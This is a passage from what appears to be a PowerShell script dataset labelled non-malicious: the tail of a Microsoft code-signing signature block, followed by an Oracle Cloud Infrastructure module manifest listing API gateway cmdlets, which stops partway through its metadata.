DV/u9omOM2Eawyo5JJJdNkM2d8qzkQ0bRuRd4HarmGunSouyb9NY7egWN5E5lUc3 # a2AROzAdHdYpObpCOdeAY2P5XqtJkk79aROpzw16wCjdSn8qMzCBzR7rvH2WVkvF # HLIxZQET1yhPb6lRmpgBQNnzidHV2Ocxjc8wNiIDzgbDkmlx54QPfw7RwQi8p1fy # 4byhBrTjv568x8NGv3gwb0RbAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU8huhNbETDU+ZWllL4DNMPCijEU4w # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMjkyMzAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAIjmD9IpQVvfB1QehvpC # Ge7QeTQkKQ7j3bmDMjwSqFL4ri6ae9IFTdpywn5smmtSIyKYDn3/nHtaEn0X1NBj # L5oP0BjAy1sqxD+uy35B+V8wv5GrxhMDJP8l2QjLtH/UglSTIhLqyt8bUAqVfyfp # h4COMRvwwjTvChtCnUXXACuCXYHWalOoc0OU2oGN+mPJIJJxaNQc1sjBsMbGIWv3 # cmgSHkCEmrMv7yaidpePt6V+yPMik+eXw3IfZ5eNOiNgL1rZzgSJfTnvUqiaEQ0X # dG1HbkDv9fv6CTq6m4Ty3IzLiwGSXYxRIXTxT4TYs5VxHy2uFjFXWVSL0J2ARTYL # E4Oyl1wXDF1PX4bxg1yDMfKPHcE1Ijic5lx1KdK1SkaEJdto4hd++05J9Bf9TAmi # u6EK6C9Oe5vRadroJCK26uCUI4zIjL/qG7mswW+qT0CW0gnR9JHkXCWNbo8ccMk1 # sJatmRoSAifbgzaYbUz8+lv+IXy5GFuAmLnNbGjacB3IMGpa+lbFgih57/fIhamq # 5VhxgaEmn/UjWyr+cPiAFWuTVIpfsOjbEAww75wURNM1Imp9NJKye1O24EspEHmb # DmqCUcq7NqkOKIG4PVm3hDDED/WQpzJDkvu4FrIbvyTGVU01vKsg4UfcdiZ0fQ+/ # V0hf8yrtq9CkB8iIuk5bBxuPMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGg0wghoJAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAQEbHQG/1crJ3IAAAAABAQwDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIDlprSrtu+YrieDenReby603 # HbyWDi5YzM7UQ1RV9o19MEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAAbPn3QU2O/P8ks8EqVDr7MrKhXLfdWc3e5zd1Bm0aEtVsKdnii22HTEe # xyAL1QxojoNjqh52t804XIU0/MYyhXPElfzUeM3FawdwzfleVd0OC+5HHIdG6Rrc # 9QrihCPPRxUWP1yTPxtNfCjpl3+B+jz05yn5UExJCV15WhQcKG0CidxXlveJnIEf # zm3nvpCSzoCr4Jofj5iEijAON7a2gLgXFWzGTgDw+WzqD/oHOrR4KYxf+/Mkuodp # XtRpyzqGv8rIKcsI2ZqZD4ZoBdHon+oJz0E/UYnHgcTRR0gZE4Cw6s8CcaLv51QK # REMZRQ38Apa7Tbpg30PuW2vv5hOiJaGCF5cwgheTBgorBgEEAYI3AwMBMYIXgzCC # F38GCSqGSIb3DQEHAqCCF3AwghdsAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFSBgsq # hkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCBUp5w2XXbZ8qBpCVjUW2tljBPFR97m4OHEvxTMPOe/2wIGZxp39n9T # GBMyMDI0MTAyODExNDA0MC43MDdaMASAAgH0oIHRpIHOMIHLMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l # cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046OTIwMC0w # NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Wg # ghHtMIIHIDCCBQigAwIBAgITMwAAAecujy+TC08b6QABAAAB5zANBgkqhkiG9w0B # AQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD # VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAeFw0yMzEyMDYxODQ1 # MTlaFw0yNTAzMDUxODQ1MTlaMIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25z # MScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046OTIwMC0wNUUwLUQ5NDcxJTAjBgNV # BAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2UwggIiMA0GCSqGSIb3DQEB # AQUAA4ICDwAwggIKAoICAQDCV58v4IuQ659XPM1DtaWMv9/HRUC5kdiEF89YBP6/ # Rn7kjqMkZ5ESemf5Eli4CLtQVSefRpF1j7S5LLKisMWOGRaLcaVbGTfcmI1vMRJ1 # tzMwCNIoCq/vy8WH8QdV1B/Ab5sK+Q9yIvzGw47TfXPE8RlrauwK/e+nWnwMt060 # akEZiJJz1Vh1LhSYKaiP9Z23EZmGETCWigkKbcuAnhvh3yrMa89uBfaeHQZEHGQq # dskM48EBcWSWdpiSSBiAxyhHUkbknl9PPztB/SUxzRZjUzWHg9bf1mqZ0cIiAWC0 # EjK7ONhlQfKSRHVLKLNPpl3/+UL4Xjc0Yvdqc88gOLUr/84T9/xK5r82ulvRp2A8 # /ar9cG4W7650uKaAxRAmgL4hKgIX5/0aIAsbyqJOa6OIGSF9a+DfXl1LpQPNKR79 # 2scF7tjD5WqwIuifS9YUiHMvRLjjKk0SSCV/mpXC0BoPkk5asfxrrJbCsJePHSOE # blpJzRmzaP6OMXwRcrb7TXFQOsTkKuqkWvvYIPvVzC68UM+MskLPld1eqdOOMK7S # bbf2tGSZf3+iOwWQMcWXB9gw5gK3AIYK08WkJJuyzPqfitgubdRCmYr9CVsNOuW+ # wHDYGhciJDF2LkrjkFUjUcXSIJd9f2ssYitZ9CurGV74BQcfrxjvk1L8jvtN7mul # IwIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFM/+4JiAnzY4dpEf/Zlrh1K73o9YMB8G # A1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8GA1UdHwRYMFYwVKBSoFCG # Tmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY3JsL01pY3Jvc29mdCUy # MFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBsBggrBgEFBQcBAQRgMF4w # XAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2Vy # dHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3J0MAwG # A1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQD # AgeAMA0GCSqGSIb3DQEBCwUAA4ICAQB0ofDbk+llWi1cC6nsfie5Jtp09o6b6ARC # pvtDPq2KFP+hi+UNNP7LGciKuckqXCmBTFIhfBeGSxvk6ycokdQr3815pEOaYWTn # HvQ0+8hKy86r1F4rfBu4oHB5cTy08T4ohrG/OYG/B/gNnz0Ol6v7u/qEjz48zXZ6 # ZlxKGyZwKmKZWaBd2DYEwzKpdLkBxs6A6enWZR0jY+q5FdbV45ghGTKgSr5ECAOn # LD4njJwfjIq0mRZWwDZQoXtJSaVHSu2lHQL3YHEFikunbUTJfNfBDLL7Gv+sTmRi # DZky5OAxoLG2gaTfuiFbfpmSfPcgl5COUzfMQnzpKfX6+FkI0QQNvuPpWsDU8sR+ # uni2VmDo7rmqJrom4ihgVNdLaMfNUqvBL5ZiSK1zmaELBJ9a+YOjE5pmSarW5sGb # n7iVkF2W9JQIOH6tGWLFJS5Hs36zahkoHh8iD963LeGjZqkFusKaUW72yMj/yxTe # GEDOoIr35kwXxr1Uu+zkur2y+FuNY0oZjppzp95AW1lehP0xaO+oBV1XfvaCur/B # 5PVAp2xzrosMEUcAwpJpio+VYfIufGj7meXcGQYWA8Umr8K6Auo+Jlj8IeFS6lSv # KhqQpmdBzAMGqPOQKt1Ow3ZXxehK7vAiim3ZiALlM0K546k0sZrxdZPgpmz7O8w9 # gHLuyZAQezCCB3EwggVZoAMCAQICEzMAAAAVxedrngKbSZkAAAAAABUwDQYJKoZI # hvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw # DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x # MjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAy # MDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIyNVowfDELMAkGA1UEBhMC # VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV # BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp # bWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoIC # AQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXIyjVX9gF/bErg4r25Phdg # M/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjoYH1qUoNEt6aORmsHFPPF # dvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6 # GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v3byNpOORj7I5LFGc6XBp # Dco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pGve2krnopN6zL64NF50Zu # yjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viSkR4dPf0gz3N9QZpGdc3E # XzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYrbqgSUei/BQOj0XOmTTd0 # lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1q # GFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSLW6CmgyFdXzB0kZSU2LlQ # +QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AFemzFER1y7435UsSFF5PA # PBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIurQIDAQABo4IB3TCCAdkw # EgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxG # NSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMFwGA1UdIARV # MFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEWM2h0dHA6Ly93d3cubWlj # cm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5Lmh0bTATBgNVHSUEDDAK # BggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMC # AYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvX # zpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20v # cGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYI # KwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG # 9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv6lwUtj5OR2R4sQaTlz0x # M7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZnOlNN3Zi6th542DYunKmC # VgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1bSNU5HhTdSRXud2f8449 # xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4rPf5KYnDvBewVIVCs/wM # nosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU6ZGyqVvfSaN0DLzskYDS # PeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDFNLB62FD+CljdQDzHVG2d # Y3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/HltEAY5aGZFrDZ+kKNxn # GSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdUCbFpAUR+fKFhbHP+Crvs # QWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKiexcdFYmNcP7ntdAoGokL # jzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTmdHRbatGePu1+oDEzfbzL # 6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZqELQdVTNYs6FwZvKhggNQ # MIICOAIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp # bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw # b3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJpY2EgT3BlcmF0aW9uczEn # MCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOjkyMDAtMDVFMC1EOTQ3MSUwIwYDVQQD # ExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMKAQEwBwYFKw4DAhoDFQCz # cgTnGasSwe/dru+cPe1NF/vwQ6CBgzCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w # IFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6smTdjAiGA8yMDI0MTAyODA0Mzcx # MFoYDzIwMjQxMDI5MDQzNzEwWjB3MD0GCisGAQQBhFkKBAExLzAtMAoCBQDqyZN2 # AgEAMAoCAQACAgsfAgH/MAcCAQACAhSeMAoCBQDqyuT2AgEAMDYGCisGAQQBhFkK # BAIxKDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAIAgEAAgMBhqAwDQYJ # KoZIhvcNAQELBQADggEBAACu8K1erSG3WA+KFwBfZzinNGLPeJwLYnFLBSgW0x8b # Vs9wv8pBHL2TK6Pe23xtA/0uCwDBh6P5fC2xQb1j36fFn4yH74aFvokpslhV4n1k # KIE8LqhplPRpGriSZ+s07DcVOeLDZ8jRV5RkN3/8myyj76R5HSgyZastSefkWLKh # dgv1pa1yD8l6NbtcI69W0Viwz4WdjgqLTwtASbKYSOWtSz0xycvyKPGMldl/P7yr # DnTw5N916Uubpcaa2OOV/GP1RGATQZoGg3+zPuKYYn2CEPlS/wpUPG/n2c5x80jT # 3Rlh8SXd7wZxaZ9KVgMTavWz6I0tYfwtNUTabE9ovWkxggQNMIIECQIBATCBkzB8 # MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVk # bW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1N # aWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAecujy+TC08b6QABAAAB # 5zANBglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0GCyqGSIb3DQEJEAEE # MC8GCSqGSIb3DQEJBDEiBCAf3CinXTSra/NCzujsM6vnOLIPuZp6A9P9nEhRKnUh # XzCB+gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EIOU2XQ12aob9DeDFXM9UFHeE # X74Fv0ABvQMG7qC51nOtMIGYMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENB # IDIwMTACEzMAAAHnLo8vkwtPG+kAAQAAAecwIgQgfk7yL/Fg+qwMxB83yRNFNNOG # Ba29IheaFT2QvafHnF0wDQYJKoZIhvcNAQELBQAEggIAVekjOr1UGfKpLUXQPb5K # wGAAkdk5eZTw5xyF6JZ5/En/i18CjypQnGbS8gG7Kq3MiMfsctcpyIat5E6u81JM # yrjZcRLuz+A76bubITb0e/Eq2xeZ3bTRjTL086l7sXKhx26fN85AoScPkjfTsrrk # Ig3+RYbBdmNEdhhfHOHPq0CHLK3lcGrnVAvcqD6ys1ZaGwQziIkmLtsd4qugxz+b # pBSPcWdGmOGb8VGnOiF+irkBzebnkq5+O2QlLoYGIqxpWxx+kctiRNjDs0S4n7YL # GEhVP8yhA2kuod13CxURGx0rX0UlDKZefvzle3gjIqnnwYo90q5ruyIprF82M2ei # 1GemGfviItCD6PPTB5UfnzPgrrGf1+LcLPSYWHN1kPHGO2fZcjCk06lcXhRNueEL # 6a9qMtdeIHWgLK9VHQoannyZ2XMzHxKUj/DGFOMItiJRaGLyy/azZrEKpR0TNUhn # bbM+ujToHL6D7rtydONMLTk9MyU3xk+HLzRBQG7K3RtHahwQ7tYhOQfOeVZIi2s7 # pCoEohY8gqTbkxIGYve3PWwlGQr5IT+QSQysq+k3X/KXB0Eu0VkBD3TcZoPYza2j # jjFETbHNGB6FWeebnJxjOUEAnGn9/Zx0bUYMEzu2uQBNtrVnwzgyeIEYcAnRzUeR # h6Oya+MkMPkqSBloHkRfGtc= # SIG # End signature block
combined_dataset/train/non-malicious/sample_25_1.ps1
sample_25_1.ps1
# # Module manifest for module 'OCI.PSModules.Apigateway' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Apigateway.dll' # Version number of this module. ModuleVersion = '77.0.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = '6afcef29-4171-4ad7-a267-5ec2cf2367ad' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Apigateway Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '77.0.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Apigateway.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Get-OCIApigatewayApi', 'Get-OCIApigatewayApiContent', 'Get-OCIApigatewayApiDeploymentSpecification', 'Get-OCIApigatewayApisList', 'Get-OCIApigatewayApiValidations', 'Get-OCIApigatewayCertificate', 'Get-OCIApigatewayCertificatesList', 'Get-OCIApigatewayDeployment', 'Get-OCIApigatewayDeploymentsList', 'Get-OCIApigatewayGateway', 'Get-OCIApigatewayGatewaysList', 'Get-OCIApigatewaySdk', 'Get-OCIApigatewaySdkLanguageTypesList', 'Get-OCIApigatewaySdksList', 'Get-OCIApigatewaySubscriber', 'Get-OCIApigatewaySubscribersList', 'Get-OCIApigatewayUsagePlan', 'Get-OCIApigatewayUsagePlansList', 'Get-OCIApigatewayWorkRequest', 'Get-OCIApigatewayWorkRequestErrorsList', 'Get-OCIApigatewayWorkRequestLogsList', 'Get-OCIApigatewayWorkRequestsList', 'Move-OCIApigatewayApiCompartment', 'Move-OCIApigatewayCertificateCompartment', 'Move-OCIApigatewayDeploymentCompartment', 'Move-OCIApigatewayGatewayCompartment', 'Move-OCIApigatewaySubscriberCompartment', 'Move-OCIApigatewayUsagePlanCompartment', 'New-OCIApigatewayApi', 'New-OCIApigatewayCertificate', 'New-OCIApigatewayDeployment', 'New-OCIApigatewayGateway', 'New-OCIApigatewaySdk', 'New-OCIApigatewaySubscriber', 'New-OCIApigatewayUsagePlan', 'Remove-OCIApigatewayApi', 'Remove-OCIApigatewayCertificate', 'Remove-OCIApigatewayDeployment', 'Remove-OCIApigatewayGateway', 'Remove-OCIApigatewaySdk', 'Remove-OCIApigatewaySubscriber', 'Remove-OCIApigatewayUsagePlan', 'Stop-OCIApigatewayWorkRequest', 'Update-OCIApigatewayApi', 'Update-OCIApigatewayCertificate', 'Update-OCIApigatewayDeployment', 'Update-OCIApigatewayGateway', 'Update-OCIApigatewaySdk', 'Update-OCIApigatewaySubscriber', 'Update-OCIApigatewayUsagePlan' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Apigateway' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 